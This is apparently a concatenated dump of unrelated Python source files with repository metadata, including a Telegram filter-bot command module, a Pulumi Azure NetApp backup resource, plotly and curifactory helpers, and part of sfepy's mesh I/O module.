self, mat="", lab1="", lab2="", lab3="", val1="", val2="", val3="", **kwargs
):
"""APDL Command: UIMP
Defines constant material properties (GUI).
Parameters
----------
mat
Material number.
lab1, lab2, lab3
Material property labels (see the MP command for valid labels).
val1, val2, val3
Values corresponding to three labels.
Notes
-----
Defines constant material properties. This is a command generated by
the Graphical User Interface (GUI) and will appear in the log file
(Jobname.LOG) if material properties are specified using the Material
Properties dialog box. This command is not intended to be typed in
directly in an ANSYS session (although it can be included in an input
file for batch input or for use with the /INPUT command).
"""
command = "UIMP,%s,%s,%s,%s,%s,%s,%s" % (
str(mat),
str(lab1),
str(lab2),
str(lab3),
str(val1),
str(val2),
str(val3),
)
return self.run(command, **kwargs)
| 36.974879
| 170
| 0.58925
|
aab264de277b03e005e296a209ec21133932f73d
| 9,248
|
py
|
Python
|
plugins/commands.py
|
Akashvbf/Unlimited-Filter-Bot
|
8e42721e3b149d48d1c73664de6ce1eed3d68884
|
[
"MIT"
] | null | null | null |
plugins/commands.py
|
Akashvbf/Unlimited-Filter-Bot
|
8e42721e3b149d48d1c73664de6ce1eed3d68884
|
[
"MIT"
] | null | null | null |
plugins/commands.py
|
Akashvbf/Unlimited-Filter-Bot
|
8e42721e3b149d48d1c73664de6ce1eed3d68884
|
[
"MIT"
] | null | null | null |
import os
import math
import json
import time
import shutil
import heroku3
import requests
from pyrogram import filters
from pyrogram import Client as trojanz
from pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton
if bool(os.environ.get("WEBHOOK", False)):
from sample_config import Config
else:
from config import Config
from script import Script
from plugins.helpers import humanbytes
from database.filters_mdb import filter_stats
from database.users_mdb import add_user, find_user, all_users
@trojanz.on_message(filters.command('id') & (filters.private | filters.group))
async def showid(client, message):
chat_type = message.chat.type
if chat_type == "private":
user_id = message.chat.id
await message.reply_text(
f"Your ID : `{user_id}`",
parse_mode="md",
quote=True
)
elif (chat_type == "group") or (chat_type == "supergroup"):
user_id = message.from_user.id
chat_id = message.chat.id
if message.reply_to_message:
reply_id = f"Replied User ID : `{message.reply_to_message.from_user.id}`"
else:
reply_id = ""
await message.reply_text(
f"Your ID : `{user_id}`\nThis Group ID : `{chat_id}`\n\n{reply_id}",
parse_mode="md",
quote=True
)
@trojanz.on_message(filters.command('info') & (filters.private | filters.group))
async def showinfo(client, message):
try:
cmd, id = message.text.split(" ", 1)
except:
id = False
pass
if id:
if (len(id) == 10 or len(id) == 9):
try:
checkid = int(id)
except:
await message.reply_text("__Enter a valid USER ID__", quote=True, parse_mode="md")
return
else:
await message.reply_text("__Enter a valid USER ID__", quote=True, parse_mode="md")
return
if Config.SAVE_USER == "yes":
name, username, dcid = await find_user(str(id))
else:
try:
user = await client.get_users(int(id))
name = str(user.first_name + (user.last_name or ""))
username = user.username
dcid = user.dc_id
except:
name = False
pass
if not name:
await message.reply_text("__USER Details not found!!__", quote=True, parse_mode="md")
return
else:
if message.reply_to_message:
name = str(message.reply_to_message.from_user.first_name\
+ (message.reply_to_message.from_user.last_name or ""))
id = message.reply_to_message.from_user.id
username = message.reply_to_message.from_user.username
dcid = message.reply_to_message.from_user.dc_id
else:
name = str(message.from_user.first_name\
+ (message.from_user.last_name or ""))
id = message.from_user.id
username = message.from_user.username
dcid = message.from_user.dc_id
if not str(username) == "None":
user_name = f"@{username}"
else:
user_name = "none"
await message.reply_text(
f"<b>👨💼Name</b> : {name}\n\n"
f"<b>📃User ID</b> : <code>{id}</code>\n\n"
f"<b>👤Username</b> : {user_name}\n\n"
f"<b>🔐Permanant USER link</b> : <a href='tg://user?id={id}'>Click here!</a>\n\n"
f"<b>📑DC ID</b> : {dcid}\n\n",
quote=True,
parse_mode="html"
)
@trojanz.on_message((filters.private | filters.group) & filters.command('status'))
async def bot_status(client,message):
if str(message.from_user.id) not in Config.AUTH_USERS:
return
chats, filters = await filter_stats()
if Config.SAVE_USER == "yes":
users = await all_users()
userstats = f"> __**{users} users have interacted with your bot!**__\n\n"
else:
userstats = ""
if Config.HEROKU_API_KEY:
try:
server = heroku3.from_key(Config.HEROKU_API_KEY)
user_agent = (
'Mozilla/5.0 (Linux; Android 10; SM-G975F) '
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/80.0.3987.149 Mobile Safari/537.36'
)
accountid = server.account().id
headers = {
'User-Agent': user_agent,
'Authorization': f'Bearer {Config.HEROKU_API_KEY}',
'Accept': 'application/vnd.heroku+json; version=3.account-quotas',
}
path = "/accounts/" + accountid + "/actions/get-quota"
request = requests.get("https://api.heroku.com" + path, headers=headers)
if request.status_code == 200:
result = request.json()
total_quota = result['account_quota']
quota_used = result['quota_used']
quota_left = total_quota - quota_used
total = math.floor(total_quota/3600)
used = math.floor(quota_used/3600)
hours = math.floor(quota_left/3600)
minutes = math.floor(quota_left/60 % 60)
days = math.floor(hours/24)
usedperc = math.floor(quota_used / total_quota * 100)
leftperc = math.floor(quota_left / total_quota * 100)
quota_details = f"""
**Heroku Account Status**
> __You have **{total} hours** of free dyno quota available each month.__
> __Dyno hours used this month__ ;
- **{used} hours** ( {usedperc}% )
> __Dyno hours remaining this month__ ;
- **{hours} hours** ( {leftperc}% )
- **Approximately {days} days!**
"""
else:
quota_details = ""
except:
print("Check your Heroku API key")
quota_details = ""
else:
quota_details = ""
uptime = time.strftime("%Hh %Mm %Ss", time.gmtime(time.time() - Config.BOT_START_TIME))
try:
t, u, f = shutil.disk_usage(".")
total = humanbytes(t)
used = humanbytes(u)
free = humanbytes(f)
disk = "\n**Disk Details**\n\n" \
f"> USED : {used} / {total}\n" \
f"> FREE : {free}\n\n"
except:
disk = ""
await message.reply_text(
"**Current status of your bot!**\n\n"
f"> __**{filters}** filters across **{chats}** chats__\n\n"
f"{userstats}"
f"> __BOT Uptime__ : **{uptime}**\n\n"
f"{quota_details}"
f"{disk}",
quote=True,
parse_mode="md"
)
@trojanz.on_message(filters.command('start') & filters.private)
async def start(client, message):
await message.reply_text(
text=Script.START_MSG.format(message.from_user.mention),
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton("Thanks for using me", callback_data="help_data")
],
[
InlineKeyboardButton("Group", url="https://t.me/Tamil_RockersGroup"),
InlineKeyboardButton("Channel", url="https://t.me/Movie_market_new_releases")
],
[
InlineKeyboardButton("🔻Official Group🔻", url="https://t.me/all_super_movies")
]
]
),
reply_to_message_id=message.message_id
)
if Config.SAVE_USER == "yes":
try:
await add_user(
str(message.from_user.id),
str(message.from_user.username),
str(message.from_user.first_name + " " + (message.from_user.last_name or "")),
str(message.from_user.dc_id)
)
except:
pass
@trojanz.on_message(filters.command('help') & filters.private)
async def help(client, message):
await message.reply_text(
text=Script.HELP_MSG,
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton("🗣️𝙶𝚛𝚘𝚞𝚙", url="https://t.me/Tamil_RockersGroup"),
InlineKeyboardButton("About Me👨💼", callback_data="about_data")
],
[
InlineKeyboardButton("🖥️ want a bot? 🖥️", url="https://t.me/geronimo1234")
]
]
),
reply_to_message_id=message.message_id
)
@trojanz.on_message(filters.command('about') & filters.private)
async def about(client, message):
await message.reply_text(
text=Script.ABOUT_MSG,
disable_web_page_preview=True,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
"⛓️ 𝚂𝙾𝚄𝚁𝙲𝙴 𝙲𝙾𝙳𝙴 ⛓️", url="https://github.com/hnhnhnhnhnlkhfbdff")
],
[
InlineKeyboardButton("🔙 𝙱𝚊𝚌𝚔", callback_data="help_data"),
InlineKeyboardButton("𝙲𝚕𝚘𝚜𝚎 🔐", callback_data="close_data"),
]
]
),
reply_to_message_id=message.message_id
)
| 32.56338
| 98
| 0.552119
|
8430bd7bb8fe855a2d8ca2fd4121f6855a91721f
| 506
|
py
|
Python
|
packages/python/plotly/plotly/validators/indicator/stream/_maxpoints.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/indicator/stream/_maxpoints.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/indicator/stream/_maxpoints.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
import _plotly_utils.basevalidators
class MaxpointsValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="maxpoints", parent_name="indicator.stream", **kwargs
):
super(MaxpointsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
max=kwargs.pop("max", 10000),
min=kwargs.pop("min", 0),
**kwargs,
)
| 31.625
| 79
| 0.626482
|
38c30a0b84e87433035166cb8f59a7895bed58df
| 424
|
py
|
Python
|
04_Run_numpydatagen.py
|
VenkateshJoshi00/ANNFaultlocation
|
0ca8ce496fc4f77656bbb130c0e6166a2cdfea2c
|
[
"MIT"
] | 1
|
2021-03-25T09:58:50.000Z
|
2021-03-25T09:58:50.000Z
|
04_Run_numpydatagen.py
|
VenkateshJoshi00/ANNFaultlocation
|
0ca8ce496fc4f77656bbb130c0e6166a2cdfea2c
|
[
"MIT"
] | null | null | null |
04_Run_numpydatagen.py
|
VenkateshJoshi00/ANNFaultlocation
|
0ca8ce496fc4f77656bbb130c0e6166a2cdfea2c
|
[
"MIT"
] | 1
|
2021-02-01T16:54:33.000Z
|
2021-02-01T16:54:33.000Z
|
from os import walk
import numpy as np
numpdatdir = './uploads/'
cleandatadir = './cleaned_data/faults_current_only/'
allFiles = [f for _, _1, f in walk(cleandatadir) ]
allFiles = allFiles[0]
tdata = []
for fn in allFiles:
tmp = np.loadtxt(cleandatadir+fn)
y = float( fn[2:-5] )
tdata += [[tmp, y]]
tdata = np.array(tdata,dtype=object)
savedataname = 'numpydata'
np.save(numpdatdir+savedataname, tdata)
| 21.2
| 52
| 0.681604
|
6a0b24103fbbf6cab873e0e5ceb7ad250a2bd9d6
| 12,988
|
py
|
Python
|
sdk/python/pulumi_azure_native/netapp/v20200801/backup.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/netapp/v20200801/backup.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/netapp/v20200801/backup.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = ['BackupArgs', 'Backup']
@pulumi.input_type
class BackupArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
pool_name: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
volume_name: pulumi.Input[str],
backup_name: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Backup resource.
:param pulumi.Input[str] account_name: The name of the NetApp account
:param pulumi.Input[str] pool_name: The name of the capacity pool
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] volume_name: The name of the volume
:param pulumi.Input[str] backup_name: The name of the backup
:param pulumi.Input[str] label: Label for backup
:param pulumi.Input[str] location: Resource location
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "pool_name", pool_name)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "volume_name", volume_name)
if backup_name is not None:
pulumi.set(__self__, "backup_name", backup_name)
if label is not None:
pulumi.set(__self__, "label", label)
if location is not None:
pulumi.set(__self__, "location", location)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the NetApp account
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="poolName")
def pool_name(self) -> pulumi.Input[str]:
"""
The name of the capacity pool
"""
return pulumi.get(self, "pool_name")
@pool_name.setter
def pool_name(self, value: pulumi.Input[str]):
pulumi.set(self, "pool_name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="volumeName")
def volume_name(self) -> pulumi.Input[str]:
"""
The name of the volume
"""
return pulumi.get(self, "volume_name")
@volume_name.setter
def volume_name(self, value: pulumi.Input[str]):
pulumi.set(self, "volume_name", value)
@property
@pulumi.getter(name="backupName")
def backup_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the backup
"""
return pulumi.get(self, "backup_name")
@backup_name.setter
def backup_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backup_name", value)
@property
@pulumi.getter
def label(self) -> Optional[pulumi.Input[str]]:
"""
Label for backup
"""
return pulumi.get(self, "label")
@label.setter
def label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
class Backup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
backup_name: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
pool_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
volume_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Backup of a Volume
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the NetApp account
:param pulumi.Input[str] backup_name: The name of the backup
:param pulumi.Input[str] label: Label for backup
:param pulumi.Input[str] location: Resource location
:param pulumi.Input[str] pool_name: The name of the capacity pool
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[str] volume_name: The name of the volume
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BackupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Backup of a Volume
:param str resource_name: The name of the resource.
:param BackupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BackupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
backup_name: Optional[pulumi.Input[str]] = None,
label: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
pool_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
volume_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BackupArgs.__new__(BackupArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["backup_name"] = backup_name
__props__.__dict__["label"] = label
__props__.__dict__["location"] = location
if pool_name is None and not opts.urn:
raise TypeError("Missing required property 'pool_name'")
__props__.__dict__["pool_name"] = pool_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if volume_name is None and not opts.urn:
raise TypeError("Missing required property 'volume_name'")
__props__.__dict__["volume_name"] = volume_name
__props__.__dict__["backup_id"] = None
__props__.__dict__["backup_type"] = None
__props__.__dict__["creation_date"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["size"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:netapp/v20200801:Backup"), pulumi.Alias(type_="azure-native:netapp:Backup"), pulumi.Alias(type_="azure-nextgen:netapp:Backup"), pulumi.Alias(type_="azure-native:netapp/v20200501:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20200501:Backup"), pulumi.Alias(type_="azure-native:netapp/v20200601:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20200601:Backup"), pulumi.Alias(type_="azure-native:netapp/v20200701:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20200701:Backup"), pulumi.Alias(type_="azure-native:netapp/v20200901:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20200901:Backup"), pulumi.Alias(type_="azure-native:netapp/v20201101:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20201101:Backup"), pulumi.Alias(type_="azure-native:netapp/v20201201:Backup"), pulumi.Alias(type_="azure-nextgen:netapp/v20201201:Backup")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Backup, __self__).__init__(
'azure-native:netapp/v20200801:Backup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Backup':
"""
Get an existing Backup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = BackupArgs.__new__(BackupArgs)
__props__.__dict__["backup_id"] = None
__props__.__dict__["backup_type"] = None
__props__.__dict__["creation_date"] = None
__props__.__dict__["label"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["size"] = None
__props__.__dict__["type"] = None
return Backup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> pulumi.Output[str]:
"""
UUID v4 used to identify the Backup
"""
return pulumi.get(self, "backup_id")
@property
@pulumi.getter(name="backupType")
def backup_type(self) -> pulumi.Output[str]:
"""
Type of backup Manual or Scheduled
"""
return pulumi.get(self, "backup_type")
@property
@pulumi.getter(name="creationDate")
def creation_date(self) -> pulumi.Output[str]:
"""
The creation date of the backup
"""
return pulumi.get(self, "creation_date")
@property
@pulumi.getter
def label(self) -> pulumi.Output[Optional[str]]:
"""
Label for backup
"""
return pulumi.get(self, "label")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Azure lifecycle management
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def size(self) -> pulumi.Output[float]:
"""
Size of backup
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
| 39.718654
| 941
| 0.626501
|
1ef108fb1d3c1287652605afb77ef8631a632965
| 1,275
|
py
|
Python
|
curifactory/args.py
|
ORNL/curifactory
|
f8be235b7fa7b91cc86f61d610d7093075b89d1f
|
[
"BSD-3-Clause"
] | 4
|
2022-01-25T18:27:49.000Z
|
2022-03-30T22:57:04.000Z
|
curifactory/args.py
|
ORNL/curifactory
|
f8be235b7fa7b91cc86f61d610d7093075b89d1f
|
[
"BSD-3-Clause"
] | 1
|
2022-03-05T19:10:42.000Z
|
2022-03-07T18:00:49.000Z
|
curifactory/args.py
|
ORNL/curifactory
|
f8be235b7fa7b91cc86f61d610d7093075b89d1f
|
[
"BSD-3-Clause"
] | null | null | null |
"""Contains the parent dataclass ExperimentArgs, containing run-specific config params."""
from dataclasses import dataclass
@dataclass
class ExperimentArgs:
"""Base arguments class, for handling naming and hashing.
In any given repo, this class should be extended to contain any needed
local configuration.
.. note::
Extending with a :code:`@dataclass` is recommended to make it syntactically
easier to read and define.
Example:
.. code-block:: python
from dataclasses import dataclass
from curifactory import ExperimentArgs
@dataclass
class Args(ExperimentArgs):
some_parameter: int = 0
# ...
"""
name: str = "UNNAMED"
"""Argument set name. This can be used to easily distinguish/refer to specific
configurations in aggregate stages. This should be unique for every args instance."""
hash: str = None
"""Curifactory automatically fills this, but it can be overriden if you need to use
very specific cache naming. (Should not normally be necessary.)"""
overwrite: bool = False
"""Whether to overwrite pre-cached values. Curifactory automatically sets this based
on command line flags."""
| 32.692308
| 93
| 0.66902
|
55d9b7698d5862f4256c659b6477b42d7684c377
| 189
|
py
|
Python
|
keylight/constants.py
|
andornaut/keylight
|
e03d7b66724b0a50cdef56a8354cd1f478e6de0c
|
[
"MIT"
] | 4
|
2021-02-05T02:55:33.000Z
|
2022-02-02T23:21:19.000Z
|
keylight/constants.py
|
andornaut/keylight
|
e03d7b66724b0a50cdef56a8354cd1f478e6de0c
|
[
"MIT"
] | null | null | null |
keylight/constants.py
|
andornaut/keylight
|
e03d7b66724b0a50cdef56a8354cd1f478e6de0c
|
[
"MIT"
] | null | null | null |
MIN_BRIGHTNESS = 0
MAX_BRIGHTNESS = 100
MIN_COLOR = 2900
# Although the API accepts values up to 7000, 6987 is the maximum that was observed to work.
MAX_COLOR = 6987
DEFAULT_PORT = 9123
| 21
| 92
| 0.772487
|
fbf4d49332ae1cba3e32ca329c10c0a8d72992c4
| 91,766
|
py
|
Python
|
sfepy/discrete/fem/meshio.py
|
Gkdnz/SfePy
|
a3a39d4e087705e9e0e8884cbf63513a2ded2108
|
[
"BSD-3-Clause"
] | null | null | null |
sfepy/discrete/fem/meshio.py
|
Gkdnz/SfePy
|
a3a39d4e087705e9e0e8884cbf63513a2ded2108
|
[
"BSD-3-Clause"
] | null | null | null |
sfepy/discrete/fem/meshio.py
|
Gkdnz/SfePy
|
a3a39d4e087705e9e0e8884cbf63513a2ded2108
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
from copy import copy
import numpy as nm
from sfepy.base.base import (complex_types, dict_from_keys_init,
assert_, is_derived_class, ordered_iteritems,
insert_static_method, output, get_default,
get_default_attr, Struct, basestr)
from sfepy.base.ioutils \
import skip_read_line, read_token, read_array, read_list, pt
import os.path as op
supported_formats = {
'.mesh' : 'medit',
'.vtk' : 'vtk',
'.node' : 'tetgen',
'.txt' : 'comsol',
'.h5' : 'hdf5',
# Order is important, avs_ucd does not guess -> it is the default.
'.inp' : ('abaqus', 'ansys_cdb', 'avs_ucd'),
'.dat' : 'ansys_cdb',
'.hmascii' : 'hmascii',
'.mesh3d' : 'mesh3d',
'.bdf' : 'nastran',
'.neu' : 'gambit',
'.med' : 'med',
'.cdb' : 'ansys_cdb',
'.msh' : 'msh_v2',
}
# Map mesh formats to read and write capabilities.
# 'r' ... read mesh
# 'w' ... write mesh
# 'rn' ... read nodes for boundary conditions
# 'wn' ... write nodes for boundary conditions
supported_capabilities = {
'medit' : ['r', 'w'],
'vtk' : ['r', 'w'],
'tetgen' : ['r'],
'comsol' : ['r', 'w'],
'hdf5' : ['r', 'w'],
'abaqus' : ['r'],
'avs_ucd' : ['r'],
'hmascii' : ['r'],
'mesh3d' : ['r'],
'nastran' : ['r', 'w'],
'gambit' : ['r', 'rn'],
'med' : ['r'],
'ansys_cdb' : ['r'],
'msh_v2' : ['r'],
}
supported_cell_types = {
'medit' : ['line2', 'tri3', 'quad4', 'tetra4', 'hexa8'],
'vtk' : ['line2', 'tri3', 'quad4', 'tetra4', 'hexa8'],
'tetgen' : ['tetra4'],
'comsol' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'hdf5' : ['user'],
'abaqus' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'avs_ucd' : ['tetra4', 'hexa8'],
'hmascii' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'mesh3d' : ['tetra4', 'hexa8'],
'nastran' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'gambit' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'med' : ['tri3', 'quad4', 'tetra4', 'hexa8'],
'ansys_cdb' : ['tetra4', 'hexa8'],
'msh_v2' : ['line2', 'tri3', 'quad4', 'tetra4', 'hexa8'],
'function' : ['user'],
}
def output_mesh_formats(mode='r'):
for key, vals in ordered_iteritems(supported_formats):
if isinstance(vals, basestr):
vals = [vals]
for val in vals:
caps = supported_capabilities[val]
if mode in caps:
output('%s (%s), cell types: %s'
% (val, key, supported_cell_types[val]))
def split_conns_mat_ids(conns_in):
"""
Split connectivities (columns except the last ones in `conns_in`) from cell
groups (the last columns of `conns_in`).
"""
conns, mat_ids = [], []
for conn in conns_in:
conn = nm.asarray(conn, dtype=nm.int32)
conns.append(conn[:, :-1])
mat_ids.append(conn[:, -1])
return conns, mat_ids
def convert_complex_output(out_in):
"""
Convert complex values in the output dictionary `out_in` to pairs of
real and imaginary parts.
"""
out = {}
for key, val in out_in.iteritems():
if val.data.dtype in complex_types:
rval = copy(val)
rval.data = val.data.real
out['real(%s)' % key] = rval
ival = copy(val)
ival.data = val.data.imag
out['imag(%s)' % key] = ival
else:
out[key] = val
return out
def _read_bounding_box(fd, dim, node_key,
c0=0, ndplus=1, ret_fd=False, ret_dim=False):
while 1:
line = skip_read_line(fd, no_eof=True).split()
if line[0] == node_key:
num = int(read_token(fd))
nod = read_array(fd, num, dim + ndplus, nm.float64)
break
bbox = nm.vstack((nm.amin(nod[:,c0:(dim + c0)], 0),
nm.amax(nod[:,c0:(dim + c0)], 0)))
if ret_dim:
if ret_fd:
return bbox, dim, fd
else:
fd.close()
return bbox, dim
else:
if ret_fd:
return bbox, fd
else:
fd.close()
return bbox
class MeshIO(Struct):
"""
The abstract class for importing and exporting meshes.
Read the docstring of the Mesh() class. Basically all you need to do is to
implement the read() method::
def read(self, mesh, **kwargs):
nodes = ...
ngroups = ...
conns = ...
mat_ids = ...
descs = ...
mesh._set_io_data(nodes, ngroups, conns, mat_ids, descs)
return mesh
See the Mesh class' docstring how the nodes, ngroups, conns, mat_ids and
descs should look like. You just need to read them from your specific
format from disk.
To write a mesh to disk, just implement the write() method and use the
information from the mesh instance (e.g. nodes, conns, mat_ids and descs)
to construct your specific format.
The methods read_dimension(), read_bounding_box() should be implemented in
subclasses, as it is often possible to get that kind of information without
reading the whole mesh file.
Optionally, subclasses can implement read_data() to read also computation
results. This concerns mainly the subclasses with implemented write()
supporting the 'out' kwarg.
The default implementation od read_last_step() just returns 0. It should be
reimplemented in subclasses capable of storing several steps.
"""
format = None
call_msg = 'called an abstract MeshIO instance!'
def __init__(self, filename, **kwargs):
Struct.__init__(self, filename=filename, **kwargs)
self.set_float_format()
def get_filename_trunk(self):
if isinstance(self.filename, file):
trunk = 'from_descriptor'
else:
trunk = op.splitext(self.filename)[0]
return trunk
def read_dimension(self, ret_fd=False):
raise ValueError(MeshIO.call_msg)
def read_bounding_box(self, ret_fd=False, ret_dim=False):
raise ValueError(MeshIO.call_msg)
def read_last_step(self):
"""The default implementation: just return 0 as the last step."""
return 0
def read_times(self, filename=None):
"""
Read true time step data from individual time steps.
Returns
-------
steps : array
The time steps.
times : array
The times of the time steps.
nts : array
The normalized times of the time steps, in [0, 1].
Notes
-----
The default implementation returns empty arrays.
"""
aux = nm.array([0.0], dtype=nm.float64)
return aux.astype(nm.int32), aux, aux
def read(self, mesh, omit_facets=False, **kwargs):
raise ValueError(MeshIO.call_msg)
def write(self, filename, mesh, **kwargs):
raise ValueError(MeshIO.call_msg)
def read_data(self, step, filename=None):
raise ValueError(MeshIO.call_msg)
def set_float_format(self, format=None):
self.float_format = get_default(format, '%e')
def get_vector_format(self, dim):
return ' '.join([self.float_format] * dim)
class UserMeshIO(MeshIO):
"""
Special MeshIO subclass that enables reading and writing a mesh using a
user-supplied function.
"""
format = 'function'
def __init__(self, filename, **kwargs):
assert_(hasattr(filename, '__call__'))
self.function = filename
MeshIO.__init__(self, filename='function:%s' % self.function.__name__,
**kwargs)
def get_filename_trunk(self):
return self.filename
def read(self, mesh, *args, **kwargs):
aux = self.function(mesh, mode='read')
if aux is not None:
mesh = aux
self.filename = mesh.name
return mesh
def write(self, filename, mesh, *args, **kwargs):
self.function(mesh, mode='write')
class MeditMeshIO(MeshIO):
format = 'medit'
def read_dimension(self, ret_fd=False):
fd = open(self.filename, 'r')
while 1:
line = skip_read_line(fd, no_eof=True).split()
if line[0] == 'Dimension':
if len(line) == 2:
dim = int(line[1])
else:
dim = int(fd.readline())
break
if ret_fd:
return dim, fd
else:
fd.close()
return dim
def read_bounding_box(self, ret_fd=False, ret_dim=False):
fd = open(self.filename, 'r')
dim, fd = self.read_dimension(ret_fd=True)
return _read_bounding_box(fd, dim, 'Vertices',
ret_fd=ret_fd, ret_dim=ret_dim)
def read(self, mesh, omit_facets=False, **kwargs):
